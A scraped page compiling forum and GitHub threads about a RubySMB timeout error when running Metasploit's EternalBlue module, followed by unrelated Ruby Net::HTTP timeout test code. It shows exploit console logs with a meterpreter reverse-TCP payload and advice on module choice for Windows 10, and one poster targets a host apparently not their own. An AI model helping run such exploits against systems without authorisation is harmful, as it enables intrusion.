Rubysmb error communicationerror read timeout expired when reading from the socket timeout 30

Кто сталкивался с такой проблемой?

superuser

Здравствуйте господа, помогите уже что только не делал не чего не выхотит. столкнулся с такой проблемай, есть комп win7 открытый 445 порт, сканировал MSF, NESSUS все говорят тачка уязвима. Запускаю exploit/windows/smb/ms17_010_eternalblue нажимаю run. и вот что появлеяться

[*] Started reverse TCP handler on 192.168.0.105:4444
[+] 10.16.116.39:445 — Host is likely VULNERABLE to MS17-010! — Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.16.116.39:445 — Connecting to target for exploitation.
[+] 10.16.116.39:445 — Connection established for exploitation.
[+] 10.16.116.39:445 — Target OS selected valid for OS indicated by SMB reply
[*] 10.16.116.39:445 — CORE raw buffer dump (38 bytes)
[*] 10.16.116.39:445 — 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 10.16.116.39:445 — 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 10.16.116.39:445 — 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.16.116.39:445 — Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.16.116.39:445 — Trying exploit with 12 Groom Allocations.
[*] 10.16.116.39:445 — Sending all but last fragment of exploit packet
[-] 10.16.116.39:445 — RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)

Вот опций
Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
—- ————— ——— ————
RHOSTS 10.16.116.39 yes The target address range or CIDR identifier
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
—- ————— ——— ————
EXITFUNC thread yes Exit technique (Accepted: », seh, thread, process, none)
LHOST 192.168.0.105 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port

Id Name
— —-
0 Windows 7 and Server 2008 R2 (x64) All Service Packs

Источник

«RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)» in windows/smb/ms17_010_eternalblue #14121

Steps to reproduce

1. Selected the windows/smb/ms17_010_eternalblue exploit in msfconsole, filled out the parameters LHOST, LPORT, RPORT, ReverseListenerBindAddress and RHOSTS to my public IP, port 445 (which was open), port 445 again, my private IP and the IP of my virtual machine that was running an old version of Windows 7.
2. Ran the exploit with the exploit command.

• opened the LPORT and made LPORT the same as the RPORT
• set all the required parameters in show options
• made the target a VM on the same network as mine and check if it crashed (spoiler alert: it didn’t)
• ran set timeout 999 to increase the timeout NB — it didn’t change the timeout at all
• made sure there wasn’t a SINGLE issue with my network that could stop it from working
  None of the previous issue threads have helped.

Were you following a specific guide/tutorial or reading documentation?

Expected behavior

The expected behaviour would be for a meterpreter shell to open.

Current behavior

I received the error RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30).

System stuff

Metasploit version

I installed Metasploit with:

• Kali package via apt
• Omnibus installer (nightly)
• Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
• Source install (please specify ruby version)

The text was updated successfully, but these errors were encountered:

Источник

«RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)» in windows/smb/ms17_010_eternalblue #14018

Steps to reproduce

1. Selected the windows/smb/ms17_010_eternalblue exploit in msfconsole, filled out the parameters LHOST, LPORT, RPORT, ReverseListenerBindAddress and RHOSTS to my public IP, port 445 (which was open), port 445 again, my private IP and the IP of my virtual machine that was running an old version of Windows 7.
2. Ran the exploit with the exploit command.

• opened the LPORT and made LPORT the same as the RPORT
• set all the required parameters in show options
• made the target a VM on the same network as mine and check if it crashed (spoiler alert: it didn’t)
• ran set timeout 999 to increase the timeout NB — it didn’t change the timeout at all
• made sure there wasn’t a SINGLE issue with my network that could stop it from working
  None of the previous issue threads have helped.

Were you following a specific guide/tutorial or reading documentation?

Expected behavior

The expected behaviour would be for a meterpreter shell to open.

Current behavior

I received the error RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30).

System stuff

Metasploit version

I installed Metasploit with:

• Kali package via apt
• Omnibus installer (nightly)
• Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
• Source install (please specify ruby version)

The text was updated successfully, but these errors were encountered:

Источник

RubySMB::Error::CommunicationError #93

Error after running ms17_010_eternalblue

[*] test:139 — Connecting to target for exploitation.
[-] test:139 — RubySMB::Error::CommunicationError
[-] test:139 — An error occured reading from the Socket
[-] test:139 — /root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/dispatcher/socket.rb:59:in rescue in recv_packet’ /root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/dispatcher/socket.rb:45:in recv_packet’
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:229:in send_recv’ /root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:36:in negotiate_request’
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client/negotiation.rb:14:in negotiate’ /root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/ruby_smb-0.0.18/lib/ruby_smb/client.rb:186:in login’
/opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:359:in smb1_anonymous_connect_ipc’ /opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:165:in smb_eternalblue’
/opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:117:in block in exploit’ /root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in each’
/root/.rvm/gems/ruby-2.4.1@metasploit-framework/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in each_with_time_with_zone’ /opt/metasploit/modules/exploits/windows/smb/ms17_010_eternalblue.rb:113:in exploit’
/opt/metasploit/lib/msf/core/exploit_driver.rb:206:in job_run_proc’ /opt/metasploit/lib/msf/core/exploit_driver.rb:167:in run’
/opt/metasploit/lib/msf/base/simple/exploit.rb:136:in exploit_simple’ /opt/metasploit/lib/msf/base/simple/exploit.rb:161:in exploit_simple’
/opt/metasploit/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in cmd_exploit’ /opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:430:in run_command’
/opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:392:in block in run_single’ /opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:386:in each’
/opt/metasploit/lib/rex/ui/text/dispatcher_shell.rb:386:in run_single’ /opt/metasploit/lib/rex/ui/text/shell.rb:205:in run’
/opt/metasploit/lib/metasploit/framework/command/console.rb:48:in start’ /opt/metasploit/lib/metasploit/framework/command/base.rb:82:in start’
/opt/metasploit/msfconsole:48:in `

The text was updated successfully, but these errors were encountered:

Источник

Rubysmb error communicationerror read timeout expired when reading from the socket timeout 30

I’ve been playing around with the EternalBlue exploit recently. I’ve downloaded a Windows 10 iso file from 2016 and used it to set up a Windows 10 Pro VM as my sandbox. I also ran the nmap script and metasploit scanner module to ensure that it is indeed vulnerable to ms17-010. However, when I run the exploit module, I get this:

I’ve spent the past hour testing out every single payload available and even tried the other eternalblue modules (which all didn’t work). Does anyone know what is denying me from gaining entry to my virtual machine here?

(PS I turned off the Windows Firewall and Windows Defender real-time protection on the win10 machine already)

That module doesn’t support Windows 10 targets. You can see from the targets that it supports Windows 7 and Server 2008.

The ms17_010_eternalblue_win8 module (despite it’s name) works on Windows 10. Says it was tested successfully on Windows 10 build 10240 and build 10586 so the build of your target is quite a bit newer but it may work.

FYI, it’s a known issue that these modules are separate and targeting is difficult which is why there’s an effort to combine them into one.

Suggested Topics

Looks like your connection to SOFTWARE TESTING was lost, please wait while we try to reconnect.

Источник

Marc-André Lafortune’s solution is still the best if you can’t upgrade to ruby 2.x.

Starting from 2.x, a subclass of Timeout::Error will be raised depending on which timeout was triggered:

• Net::OpenTimeout
• Net::ReadTimeout

However, the read_timeout behavior is strange on 2.x, because it seems to double the value you set. This article explains why.

Here’s a test for both timeouts (tested on 1.8.7, 1.9.3, 2.1.2, 2.2.4).

EDIT: The open_timeout test works on Mac, but on Linux, the client gets a «connection refused» error.

require "net/http"
require "socket"

SERVER_HOST = '127.0.0.1'
SERVER_PORT = 9999

def main
  puts 'with_nonlistening_server'
  with_nonlistening_server do
    make_request
  end
  
  puts
  puts 'with_listening_server'
  with_listening_server do
    make_request
  end
end

def with_listening_server
  # This automatically starts listening
  serv = TCPServer.new(SERVER_HOST, SERVER_PORT)
  begin
    yield
  ensure
    serv.close
  end
end

def with_nonlistening_server
  raw_serv = Socket.new Socket::AF_INET, Socket::SOCK_STREAM, 0
  addr     = Socket.pack_sockaddr_in SERVER_PORT, SERVER_HOST

  # Bind, but don't listen
  raw_serv.bind addr
  begin
    yield
  ensure
    raw_serv.close
  end
end

def make_request
  http = Net::HTTP.new(SERVER_HOST, SERVER_PORT)
  http.open_timeout = 1
  http.read_timeout = 1  # seems to be doubled on ruby 2.x
  start_tm = Time.now
  begin
    http.start
    begin
      http.get('/')
    rescue Timeout::Error => err
      puts "Read timeout: #{err.inspect}"
    end
  rescue Timeout::Error => err
    puts "Open timeout: #{err.inspect}"
  end
  end_tm = Time.now
  puts "Duration (sec): #{end_tm - start_tm}"
end

if __FILE__ == $PROGRAM_NAME
  main
end

Example output on 1.9.3:

with_nonlistening_server
Open timeout: #<Timeout::Error: execution expired>
Duration (sec): 1.002477

with_listening_server
Read timeout: #<Timeout::Error: Timeout::Error>
Duration (sec): 1.00599

Example output on 2.1.2:

with_nonlistening_server
Open timeout: #<Net::OpenTimeout: execution expired>
Duration (sec): 1.005923

with_listening_server
Read timeout: #<Net::ReadTimeout: Net::ReadTimeout>
Duration (sec): 2.009582